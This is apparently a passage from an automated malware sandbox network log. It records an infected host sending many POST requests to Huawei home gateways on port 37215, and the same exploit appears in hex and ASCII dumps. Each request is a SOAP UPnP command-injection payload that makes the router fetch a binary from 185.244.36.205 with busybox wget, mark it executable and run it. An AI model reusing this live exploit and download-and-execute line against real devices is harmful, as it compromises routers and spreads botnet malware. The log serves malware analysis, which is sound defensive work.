                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1836192.168.2.1552650122.51.47.21837215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:21.947710037 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1837192.168.2.1559922157.212.74.16637215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:21.947712898 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1838192.168.2.154509045.253.174.22737215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:21.947729111 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1839192.168.2.155765031.183.69.6137215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:21.947742939 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1840192.168.2.1541720222.48.243.7637215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:21.947760105 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1841192.168.2.1536474156.14.16.23737215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:21.947777033 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1842192.168.2.153775445.168.126.6837215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:21.947803020 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1843192.168.2.154569641.37.181.4437215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:21.947830915 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1844192.168.2.153281637.15.199.21337215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:21.947854996 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1845192.168.2.1548952186.118.183.21437215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:21.947870970 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
